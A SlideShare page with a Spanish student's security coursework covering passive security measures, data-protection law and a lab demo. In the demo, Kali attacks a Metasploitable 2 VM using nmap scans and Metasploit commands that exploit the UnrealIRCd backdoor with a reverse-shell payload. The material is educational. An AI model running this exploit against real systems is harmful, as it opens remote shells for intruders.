SlideShare una empresa de Scribd logo

Proyecto1 SEIN

Descargar como DOCX, PDF
P
PatriD

Proyecto 1

Educación
1 de 13
Proyecto en el que se incluyen tanto la descripción de medidas aplicables de seguridad en diversos casos como un ataque desde una máquina kali-linux a una máquina con metasplotaible para atacarla. Proyecto 1. Conceptos Seguridad informática Patricia Durán de Jesús
ÍNDICE 1. MEDIDAS DE SEGURIDAD PASIVA...................................................................1 2. ASEGURAR LA PRIVACIDAD .........................................................................3 3. DEMOSTRACIÓN VULNERABILIDADES .............................................................6
Seguridad informática 2017-2018 Patricia Durán de Jesús 1 1. MEDIDAS DE SEGURIDAD PASIVA Aplicar medidas de seguridad pasiva en sistemas informáticos describiendo características de entornos y relacionándolas con sus necesidades.  Trabajas en una auditoría de seguridad informática. Llega un nuevo cliente que desea conocer la situación de su empresa en cuanto a seguridad informática y si es aceptable o podría mejorar. Durante la entrevista tomas las siguientes notas:  El edificio tiene un servicio de vigilancia a través de una empresa externa. Por reducción del presupuesto, ahora solo hay un vigilante que también atiende el edificio del otro lado de la calle. → Se necesita mayor seguridad. No se puede tener a un único vigilante y que encima debe estar vigilando dos edificios ya que la vigilancia no es igual de fiable y constante.  El CPD tiene otro vigilante, de otra compañía, que también atiende el teléfono de la centralita a partir de las 3, cuando termina el turno del recepcionista. → El centro de protección de datos debe estar bien protegido, no puede haber un vigilante que tenga 2 cargos más porque no presta la atención suficiente y al distraerse pueden haber posibles robos o alteraciones.  Para entrar al CPD, cada informático tiene una tarjeta particular, si bien hay una en el cajón de la mesa del vigilante para el personal de limpieza o por si ocurre una emergencia. → Cada tarjeta debe ser intransferible y no pueden tener acceso a cada tarjeta particular distintas personas al propietario de la misma. Además de que cada informático no debe tener acceso al CPD, solo los encargados del mismo.  Una vez a la semana se hace la copia de seguridad. Como solo disponen de un dispositivo de cinta, los cuatro servidores se reparten cada semana del mes. Dado que solo hay un vigilante para el CPD, las cintas se dejan dentro de la sala, cada una encima de su servidor (cada servidor tiene una cinta en exclusiva). → Las copias deben ser instantáneas ya que en el momento en que se hacen cambios, añaden o quitan cosas se pueden perder datos. Las cintas no pueden estar a plena vista y mucho menos encima de cada servidor, si alguien entrase a robar los datos, l tendría muy fácil ya que solo hay un vigilante. Se tiene que poner mayor vigilancia, realizar copias de seguridad
Seguridad informática 2017-2018 Patricia Durán de Jesús 2 instantáneas, mejorar el método de las copias y guardarlas en un lugar seguro que no esté a la vista de cualquiera.  El edificio pertenece al patrimonio histórico y no admite reformas en la fachada. Por tanto, no ha sido posible instalar equipos de aire acondicionado en el CPD. Para combatir el calor que desprenden los ordenadores, las ventanas están siempre abiertas. Cada servidor tiene un disco duro de alta gama, que no ha fallado nunca. → Se necesita refrigeración, las ventanas no pueden estar abiertas, entran suciedad y polvo constantemente y eso genera más calor en los equipos, se debe instalar refrigeración y en caso de que no puedan por no admitir reformas, se deberá cambiar el CPD a otro edificio que si permita realizar los cambios necesarios.  Los servidores tienen doble fuente de alimentación, por si se estropea alguna. → Está bien e incluso deberían haber Sistemas de Alimentación Ininterrumpida.  El presidente y el contable tienen cada uno un portátil de la empresa. El disco duro de estas máquinas no está cifrado porque no se arriesgan al desastre que supondría olvidar la contraseña. → Cifrar el disco duro y cada equipo protegerlo con una contraseña bien elaborada, sin datos personales o relacionados con el trabajo o empresa.  Los ordenadores tienen dos usuarios: uno para las tareas normales y otro cuando necesitan realizar alguna instalación o modificar un parámetro del sistema operativo. Los empleados saben cuándo deben usar cada uno. → Los empleados no deben tener acceso a instalaciones o modificaciones de parámetros del sistema operativo. Eso puede ocasionar problemas, ya que pueden configurar o borrar algo que no deben o incluso instalar malware sin darse cuenta y crea vulnerabilidades. Los empleados deben tener un usuario en el que tengan permisos limitados.  Termináis por hoy la entrevista porque ha sido una reunión muy larga. Todavía no has redactado el informe final, pero ¿encuentras algo que mejorar? ¿Qué alternativa le puedes proponer? Cambiar la seguridad y forma de actuar de la empresa con lo ya indicado en los apartados anteriores. Modificaría los niveles de seguridad, copias de seguridad realizadas, etc.
Seguridad informática 2017-2018 Patricia Durán de Jesús 3 2. ASEGURAR LA PRIVACIDAD Asegurar la privacidad de la información transmitida en redes informáticas describiendo vulnerabilidades e instalando software específico.  Al día siguiente continúa la entrevista: Tus nuevas notas son:  Hay una red wifi en la oficina que permite entrar en la red de ordenadores y salir a Internet. No tiene contraseña para que los clientes puedan utilizarla con total comodidad. → Deben de poner una contraseña, ya que no tenerla no hace que sea más cómodo si no que permite a personas externas a la empresa que puedan acceder sin ningún tipo de complejidad. Al menos teniendo contraseñas y diferenciando bien la red pública de la red privada de la empresa evitas posibles intrusos.  La mayoría de los ordenadores utilizan Windows XP, pero algunos empleados necesitan Windows 7, 8 o incluso 10 para correr ciertas aplicaciones. Como la empresa no puede afrontar la compra de nuevas licencias, están utilizando software pirata. → La empresa debe asumir el precio de unas licencias de Windows 10, por ejemplo, ya que es el más actual y tiene soporte técnico mientras que Windows XP ya no. En caso de no poder asumir el precio, podrían pasar a un software libre.  En cuanto al antivirus, cada empleado pone el que más le gusta y se los pasan entre ellos mediante dispositivos USB. → Se debería tener un mismo antivirus para todos los equipos y estar terminantemente prohibido el uso de USB ajenos o propios de los trabajadores, ya que existe el riesgo de que ese USB esté infectado con malware e infectase a toda la empresa.  Los ordenadores que hacen de servidores tienen activadas las actualizaciones automáticas de todas las aplicaciones y el sistema operativo, pero en los ordenadores de empleados no se hace porque han visto que se satura la conexión a Internet. → Se deben actualizar siempre que sea necesario ya que en las actualizaciones existen modificaciones del software que quizá implementen mayor seguridad o arreglen fallos que puedan ocasionar un agujero de seguridad en un futuro lejano, o incluso cercano.  La mayoría de los equipos de red son switch y routers, pero algunos despachos todavía tienen hubs porque son fiables y el ancho de banda es suficiente. → Los hubs generan mucho tráfico y consumen más
Seguridad informática 2017-2018 Patricia Durán de Jesús 4 ancho de banda, aunque son más rápidos, no son tan fiables como pueden ser un switch o un router-  Para entrar a la red desde Internet utilizan Hamachi, un servicio gratuito y muy sencillo de instalar. → Hamachi tiene como desventajas los problemas con los enrutadores, ya que se generan conflictos. Otra opción para tener una red privada sería OpenVPN.  El servidor web está instalado sobre una máquina con sistema operativo Linux Ubuntu Server 9.04. → Cambiar la versión de Linux Ubuntu Server a una más actualizada para mantenernos al día en actualizaciones tanto a nivel de seguridad como software en general. Últimas versiones: Ubuntu Server 16.04.3 LTS y Ubuntu Server 17.04 La empresa recoge datos de las personas que solicitan información acerca de las promociones que tiene actualmente. El objetivo es poder enviarles información sobre futuras promociones. Los datos que se solicitan son: nombre, dirección y correo electrónico. Una secretaria introduce los datos en una hoja Excel en su ordenador.  ¿Crees que tendría que haber solicitado a la Agencia de Protección de Datos la creación del fichero que contiene los datos? La Ley Orgánica de Protección de datos de carácter personal de las personas físicas. Pueden estar en cualquier tipo de soporte, digitalizado o no. La Ley establece cómo se pueden tomar los datos, que tipo de almacenamiento protegido necesitan y qué derecho y obligaciones tiene el ciudadano. Se debe solicitar o informar a la Agencia de Protección de Datos.  ¿Qué nivel de seguridad requerirá el fichero? Requiere el nivel básico  ¿Qué medidas de seguridad requiere este nivel? - Identificar y autenticar a los usuarios que pueden trabajar con estos datos - Llevar un registro de incidencias acontecidas en el fichero - Realizar copias de seguridad como mínimo semanalmente  Haz un listado de las infracciones que podrían cometerse con respecto al fichero y destaca cuáles de ellas supondrían una sanción mayor. Leves (601,01 € y 60.101,21 €): - No solicitar la inscripción del fichero en la AEDP
Seguridad informática 2017-2018 Patricia Durán de Jesús 5 - Recopilar datos personales sin informar previamente - No atender a las solicitudes de rectificación o cancelación - No atender a las consultas por parte de la AGPD Graves (60.101,21 € y 300.506,25 €) - No inscribir los ficheros en la AGPD. - Utilizar los ficheros con distinta finalidad con la se crearon. - No tener el consentimiento del interesado para recabar sus datos personales - No permitir el acceso a los ficheros. - Mantener datos inexactos o no efectuar las modificaciones solicitadas - No seguir los principios y garantías de la LOPD - Tratar datos especialmente protegidos sin la autorización del afectado - No remitir a la AGPD las notificaciones previstas en la LOPD. - Mantener los ficheros sin las debidas condiciones de seguridad. Muy graves (300.506,25 € y 601.012,1 €) - Crear ficheros para almacenar datos que revelen datos especialmente protegidos. - Recogida de datos de manera engañosa o fraudulenta. - Recabar datos especialmente protegidos sin la autorización del afectado. - No atender u obstaculizar de forma sistemática las solicitudes de cancelación o rectificación. - Vulnerar el secreto sobre datos especialmente protegidos. - La comunicación o cesión de datos cuando ésta no esté permitida. - No cesar en el uso ilegítimo a petición de la AGPD. - Tratar los datos de forma ilegítima o con menosprecio de principios y garantías que le sean de aplicación. - No atender de forma sistemática los requerimientos de la AGPD. - La transferencia temporal o definitiva de datos de carácter personal con destino a países sin nivel de protección equiparable o sin autorización
Seguridad informática 2017-2018 Patricia Durán de Jesús 6 3. DEMOSTRACIÓN VULNERABILIDADES Completar el informe con una demo en la que le harás ver al cliente cómo se pueden aprovechar las vulnerabilidades de sus sistemas. Para ello vas a realizar la práctica de INCIBE “Explotando un sistema” perteneciente al capítulo “Fundamentos del análisis de sistemas”, siguiendo el correspondiente vídeo-tutorial de YouTube. Vas a necesitar dos máquinas virtuales, una con kali-linux (máquina atacante) y la otra con metasploitable 2 (máquina vulnerable). Primero comprobaremos la visibilidad entre las máquinas, tanto con kali-linux como con la máquina vulnerable, la metasploitable. Podemos comprobar que la IP de la máquina vulnerable es 192.168.1.165 y la máquina atacante 192.168.1.166
Seguridad informática 2017-2018 Patricia Durán de Jesús 7 Para comprobar la visibilidad entre ambas, haremos ping desde la máquina atacante a la máquina vulnerable: - Ping 192.168.1.165 Utilizaremos Nmap para escanear la IP de la red (192.168.1.0) para encontrar los equipos encendidos en la red.
Seguridad informática 2017-2018 Patricia Durán de Jesús 8 Procederemos a escanear los puertos de nuestra máquina con nmap –sT –O 192.168.1.166 (IP de la máquina atacada) Lo siguiente que haremos será: Nmap –sT –sV (IP de la máquina vulnerable, atacada)
Seguridad informática 2017-2018 Patricia Durán de Jesús 9 El siguiente paso a realizar será “telnet (IP del objetivo) (Puerto de telnet). Una vez hecho, podremos poner herramientas como FTP o SSH. El procedimiento es abrir la consola e introducir los comandos: - ftp <dirección IP> - telnet <dirección IP> - ssh <dirección IP>
Seguridad informática 2017-2018 Patricia Durán de Jesús 10
Seguridad informática 2017-2018 Patricia Durán de Jesús 11 Abriremos una consola del sistema e introduciremos estos comandos: Msfconsole Use exploit /unix/irc/unreal_ircd_3281_backdoor Set RHOST <IP Metasploitable> Set payload <payload> (cmd/unix/reverse) Set LHOST <IP Kali linux> Exploit

Recomendados

Proyecto2 sein
Proyecto2 seinProyecto2 sein
Proyecto2 seinPatriD
 
Trabajo Final de IMS (IP Multimedia Subsystem) - Enunciados
Trabajo Final de IMS (IP Multimedia Subsystem) - EnunciadosTrabajo Final de IMS (IP Multimedia Subsystem) - Enunciados
Trabajo Final de IMS (IP Multimedia Subsystem) - EnunciadosAndy Juan Sarango Veliz
 
Encriptación
EncriptaciónEncriptación
EncriptaciónESPE
 
presentacion
presentacionpresentacion
presentacionÊzââ Sthââr Cabrera Espinoza
 
Trabajo Final de IMS (IP Multimedia Subsystem)
Trabajo Final de IMS (IP Multimedia Subsystem)Trabajo Final de IMS (IP Multimedia Subsystem)
Trabajo Final de IMS (IP Multimedia Subsystem)Andy Juan Sarango Veliz
 
UNIDAD 4: COMERCIO ELECTRONICO
UNIDAD 4: COMERCIO ELECTRONICOUNIDAD 4: COMERCIO ELECTRONICO
UNIDAD 4: COMERCIO ELECTRONICOAna Gomez
 
Seguridad en internet
Seguridad en internetSeguridad en internet
Seguridad en internetkrmn35
 
Seguridad E Internet
Seguridad E InternetSeguridad E Internet
Seguridad E InternetNet-Learning - Soluciones para e-learning
 

Recomendados

Proyecto2 sein
Proyecto2 seinProyecto2 sein
Proyecto2 seinPatriD
 
Trabajo Final de IMS (IP Multimedia Subsystem) - Enunciados
Trabajo Final de IMS (IP Multimedia Subsystem) - EnunciadosTrabajo Final de IMS (IP Multimedia Subsystem) - Enunciados
Trabajo Final de IMS (IP Multimedia Subsystem) - EnunciadosAndy Juan Sarango Veliz
 
Encriptación
EncriptaciónEncriptación
EncriptaciónESPE
 
presentacion
presentacionpresentacion
presentacionÊzââ Sthââr Cabrera Espinoza
 
Trabajo Final de IMS (IP Multimedia Subsystem)
Trabajo Final de IMS (IP Multimedia Subsystem)Trabajo Final de IMS (IP Multimedia Subsystem)
Trabajo Final de IMS (IP Multimedia Subsystem)Andy Juan Sarango Veliz
 
UNIDAD 4: COMERCIO ELECTRONICO
UNIDAD 4: COMERCIO ELECTRONICOUNIDAD 4: COMERCIO ELECTRONICO
UNIDAD 4: COMERCIO ELECTRONICOAna Gomez
 
Seguridad en internet
Seguridad en internetSeguridad en internet
Seguridad en internetkrmn35
 
Seguridad E Internet
Seguridad E InternetSeguridad E Internet
Seguridad E InternetNet-Learning - Soluciones para e-learning
 
Noticia 6 hugo
Noticia 6 hugoNoticia 6 hugo
Noticia 6 hugoHHanyya ALvareezz
 
Cabrera aldana 5to alimentaria
Cabrera aldana 5to alimentariaCabrera aldana 5to alimentaria
Cabrera aldana 5to alimentariageralyfernandacabreraaldana
 
Seguridad Informática
Seguridad InformáticaSeguridad Informática
Seguridad InformáticaAdrián Pisabarro García
 
La nube definicion y uso
La nube definicion y uso La nube definicion y uso
La nube definicion y uso Neri Naarai Lopez Rodriguez
 
Presentation de proyecto N°3
Presentation de proyecto N°3Presentation de proyecto N°3
Presentation de proyecto N°3Andres Saavedra
 
Ataques DDoS y DoS | G2k hosting
Ataques DDoS y DoS | G2k hostingAtaques DDoS y DoS | G2k hosting
Ataques DDoS y DoS | G2k hostingG2K Hosting
 
Defensas contra ataques informaticos
Defensas contra ataques informaticosDefensas contra ataques informaticos
Defensas contra ataques informaticosLeandro Morales Alvarez
 
Noticia6
Noticia6Noticia6
Noticia6ingridarelireyes
 
Noticia6
Noticia6Noticia6
Noticia6adjkasng
 
Gestión de Certificados Digitales con OpenSSL
Gestión de Certificados Digitales con OpenSSLGestión de Certificados Digitales con OpenSSL
Gestión de Certificados Digitales con OpenSSLEsteban Saavedra
 
La proteccion de datos
La proteccion de datosLa proteccion de datos
La proteccion de datosChristian Poaquiza
 
La nube
La nubeLa nube
La nubeluis-2211
 
Gestión de Certificados Digitales con OpenSSL
Gestión de Certificados Digitales con OpenSSLGestión de Certificados Digitales con OpenSSL
Gestión de Certificados Digitales con OpenSSLEsteban Saavedra
 
Unidad 4: Criptografía
Unidad 4: CriptografíaUnidad 4: Criptografía
Unidad 4: Criptografíacarmenrico14
 
Susan yisell lópez ruano 5to b
Susan yisell lópez ruano 5to bSusan yisell lópez ruano 5to b
Susan yisell lópez ruano 5to byiselitha02
 
Noticia 6
Noticia 6 Noticia 6
Noticia 6 Essa Hom's
 
Ssh sftp y scp
Ssh sftp y scpSsh sftp y scp
Ssh sftp y scpGer Hernandez
 
Se puede subir
Se puede subirSe puede subir
Se puede subirthelatin
 
Proyecto 1 SEIN - Patricia Durán
Proyecto 1 SEIN - Patricia DuránProyecto 1 SEIN - Patricia Durán
Proyecto 1 SEIN - Patricia DuránPatriD
 
Proyecto 1
Proyecto 1Proyecto 1
Proyecto 1Miguel Ángel Marchal Barrera
 
Proyecto 1
Proyecto 1Proyecto 1
Proyecto 1LauraSLeon
 
Proyecto1
Proyecto1Proyecto1
Proyecto1ElisabetBlanco
 

Más contenido relacionado

La actualidad más candente

Presentation de proyecto N°3
Presentation de proyecto N°3Presentation de proyecto N°3
Presentation de proyecto N°3Andres Saavedra
 
Ataques DDoS y DoS | G2k hosting
Ataques DDoS y DoS | G2k hostingAtaques DDoS y DoS | G2k hosting
Ataques DDoS y DoS | G2k hostingG2K Hosting
 
Gestión de Certificados Digitales con OpenSSL
Gestión de Certificados Digitales con OpenSSLGestión de Certificados Digitales con OpenSSL
Gestión de Certificados Digitales con OpenSSLEsteban Saavedra
 
Gestión de Certificados Digitales con OpenSSL
Gestión de Certificados Digitales con OpenSSLGestión de Certificados Digitales con OpenSSL
Gestión de Certificados Digitales con OpenSSLEsteban Saavedra
 
Unidad 4: Criptografía
Unidad 4: CriptografíaUnidad 4: Criptografía
Unidad 4: Criptografíacarmenrico14
 
Susan yisell lópez ruano 5to b
Susan yisell lópez ruano 5to bSusan yisell lópez ruano 5to b
Susan yisell lópez ruano 5to byiselitha02
 
Se puede subir
Se puede subirSe puede subir
Se puede subirthelatin
 

La actualidad más candente (18)

Noticia 6 hugo
Noticia 6 hugoNoticia 6 hugo
Noticia 6 hugo
 
Cabrera aldana 5to alimentaria
Cabrera aldana 5to alimentariaCabrera aldana 5to alimentaria
Cabrera aldana 5to alimentaria
 
Seguridad Informática
Seguridad InformáticaSeguridad Informática
Seguridad Informática
 
La nube definicion y uso
La nube definicion y uso La nube definicion y uso
La nube definicion y uso
 
Presentation de proyecto N°3
Presentation de proyecto N°3Presentation de proyecto N°3
Presentation de proyecto N°3
 
Ataques DDoS y DoS | G2k hosting
Ataques DDoS y DoS | G2k hostingAtaques DDoS y DoS | G2k hosting
Ataques DDoS y DoS | G2k hosting
 
Defensas contra ataques informaticos
Defensas contra ataques informaticosDefensas contra ataques informaticos
Defensas contra ataques informaticos
 
Noticia6
Noticia6Noticia6
Noticia6
 
Noticia6
Noticia6Noticia6
Noticia6
 
Gestión de Certificados Digitales con OpenSSL
Gestión de Certificados Digitales con OpenSSLGestión de Certificados Digitales con OpenSSL
Gestión de Certificados Digitales con OpenSSL
 
La proteccion de datos
La proteccion de datosLa proteccion de datos
La proteccion de datos
 
La nube
La nubeLa nube
La nube
 
Gestión de Certificados Digitales con OpenSSL
Gestión de Certificados Digitales con OpenSSLGestión de Certificados Digitales con OpenSSL
Gestión de Certificados Digitales con OpenSSL
 
Unidad 4: Criptografía
Unidad 4: CriptografíaUnidad 4: Criptografía
Unidad 4: Criptografía
 
Susan yisell lópez ruano 5to b
Susan yisell lópez ruano 5to bSusan yisell lópez ruano 5to b
Susan yisell lópez ruano 5to b
 
Noticia 6
Noticia 6 Noticia 6
Noticia 6
 
Ssh sftp y scp
Ssh sftp y scpSsh sftp y scp
Ssh sftp y scp
 
Se puede subir
Se puede subirSe puede subir
Se puede subir
 

Similar a Proyecto1 SEIN

Proyecto 1 SEIN - Patricia Durán
Proyecto 1 SEIN - Patricia DuránProyecto 1 SEIN - Patricia Durán
Proyecto 1 SEIN - Patricia DuránPatriD
 
PROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOS
PROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOSPROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOS
PROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOSJenny Johanna
 
Cloud Computing
Cloud ComputingCloud Computing
Cloud ComputingRobal96
 
Taller resdes de computadores sergio higuera
Taller resdes de computadores sergio higueraTaller resdes de computadores sergio higuera
Taller resdes de computadores sergio higueraSergio Higuera
 
Diseño Movistar
Diseño MovistarDiseño Movistar
Diseño MovistarUPS
 
Redes 1 gabriel rojas
Redes 1 gabriel rojasRedes 1 gabriel rojas
Redes 1 gabriel rojassneiderr
 
Redes de Computador
Redes de ComputadorRedes de Computador
Redes de Computadorpupoxws
 
Nube informatica
Nube informaticaNube informatica
Nube informaticammyepez05
 
Peligros de la informática en el respaldo de la información
Peligros de la informática en el respaldo de la informaciónPeligros de la informática en el respaldo de la información
Peligros de la informática en el respaldo de la informaciónMariana Olivares
 
Actividad individual-unidad-2-paso-6-avance-de-la-propuesta-1
Actividad individual-unidad-2-paso-6-avance-de-la-propuesta-1Actividad individual-unidad-2-paso-6-avance-de-la-propuesta-1
Actividad individual-unidad-2-paso-6-avance-de-la-propuesta-1LuisEduardoGalindezD
 
Proyecto final
Proyecto finalProyecto final
Proyecto final1smr07
 
Investigación centro de maestros zumpango
Investigación centro de maestros zumpangoInvestigación centro de maestros zumpango
Investigación centro de maestros zumpangojuan1428
 

Similar a Proyecto1 SEIN (20)

Proyecto 1 SEIN - Patricia Durán
Proyecto 1 SEIN - Patricia DuránProyecto 1 SEIN - Patricia Durán
Proyecto 1 SEIN - Patricia Durán
 
Proyecto 1
Proyecto 1Proyecto 1
Proyecto 1
 
Proyecto 1
Proyecto 1Proyecto 1
Proyecto 1
 
Proyecto1
Proyecto1Proyecto1
Proyecto1
 
PROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOS
PROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOSPROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOS
PROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOS
 
Proyecto 1 - Conceptos
Proyecto 1 - ConceptosProyecto 1 - Conceptos
Proyecto 1 - Conceptos
 
Cloud Computing
Cloud ComputingCloud Computing
Cloud Computing
 
Seguridad física en la empresa
Seguridad física en la empresaSeguridad física en la empresa
Seguridad física en la empresa
 
3° corte
3° corte3° corte
3° corte
 
Seguridad en redes
Seguridad en redesSeguridad en redes
Seguridad en redes
 
Taller resdes de computadores sergio higuera
Taller resdes de computadores sergio higueraTaller resdes de computadores sergio higuera
Taller resdes de computadores sergio higuera
 
Diseño Movistar
Diseño MovistarDiseño Movistar
Diseño Movistar
 
Redes 1 gabriel rojas
Redes 1 gabriel rojasRedes 1 gabriel rojas
Redes 1 gabriel rojas
 
Redes de Computador
Redes de ComputadorRedes de Computador
Redes de Computador
 
Nube informatica
Nube informaticaNube informatica
Nube informatica
 
Peligros de la informática en el respaldo de la información
Peligros de la informática en el respaldo de la informaciónPeligros de la informática en el respaldo de la información
Peligros de la informática en el respaldo de la información
 
Actividad individual-unidad-2-paso-6-avance-de-la-propuesta-1
Actividad individual-unidad-2-paso-6-avance-de-la-propuesta-1Actividad individual-unidad-2-paso-6-avance-de-la-propuesta-1
Actividad individual-unidad-2-paso-6-avance-de-la-propuesta-1
 
Proyecto final
Proyecto finalProyecto final
Proyecto final
 
Politicas de seguridad
Politicas de seguridadPoliticas de seguridad
Politicas de seguridad
 
Investigación centro de maestros zumpango
Investigación centro de maestros zumpangoInvestigación centro de maestros zumpango
Investigación centro de maestros zumpango
 

Último

OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptxOLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptxjosetrinidadchavez
 
RETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxRETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxAna Fernandez
 
Estrategia de Enseñanza y Aprendizaje.pdf
Estrategia de Enseñanza y Aprendizaje.pdfEstrategia de Enseñanza y Aprendizaje.pdf
Estrategia de Enseñanza y Aprendizaje.pdfromanmillans
 
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyzel CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyzprofefilete
 
Uses of simple past and time expressions
Uses of simple past and time expressionsUses of simple past and time expressions
Uses of simple past and time expressionsConsueloSantana3
 
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdfTarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdfManuel Molina
 
Procesos Didácticos en Educación Inicial .pptx
Procesos Didácticos en Educación Inicial .pptxProcesos Didácticos en Educación Inicial .pptx
Procesos Didácticos en Educación Inicial .pptxMapyMerma1
 
TEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdfTEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdfDannyTola1
 
La Función tecnológica del tutor.pptx
La Función tecnológica del tutor.pptxLa Función tecnológica del tutor.pptx
La Función tecnológica del tutor.pptxJunkotantik
 
Plan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPEPlan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPELaura Chacón
 
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOTUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOweislaco
 
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMALVOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMALEDUCCUniversidadCatl
 
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxMartín Ramírez
 
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARONARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFAROJosé Luis Palma
 
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...fcastellanos3
 
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxPresentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxYeseniaRivera50
 
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDUFICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDUgustavorojas179704
 
Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.José Luis Palma
 

Último (20)

OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptxOLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
 
RETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxRETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docx
 
Earth Day Everyday 2024 54th anniversary
Earth Day Everyday 2024 54th anniversaryEarth Day Everyday 2024 54th anniversary
Earth Day Everyday 2024 54th anniversary
 
Estrategia de Enseñanza y Aprendizaje.pdf
Estrategia de Enseñanza y Aprendizaje.pdfEstrategia de Enseñanza y Aprendizaje.pdf
Estrategia de Enseñanza y Aprendizaje.pdf
 
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyzel CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
 
Uses of simple past and time expressions
Uses of simple past and time expressionsUses of simple past and time expressions
Uses of simple past and time expressions
 
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdfTarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
 
Procesos Didácticos en Educación Inicial .pptx
Procesos Didácticos en Educación Inicial .pptxProcesos Didácticos en Educación Inicial .pptx
Procesos Didácticos en Educación Inicial .pptx
 
TEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdfTEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdf
 
La Función tecnológica del tutor.pptx
La Función tecnológica del tutor.pptxLa Función tecnológica del tutor.pptx
La Función tecnológica del tutor.pptx
 
Plan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPEPlan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPE
 
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOTUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
 
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMALVOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
 
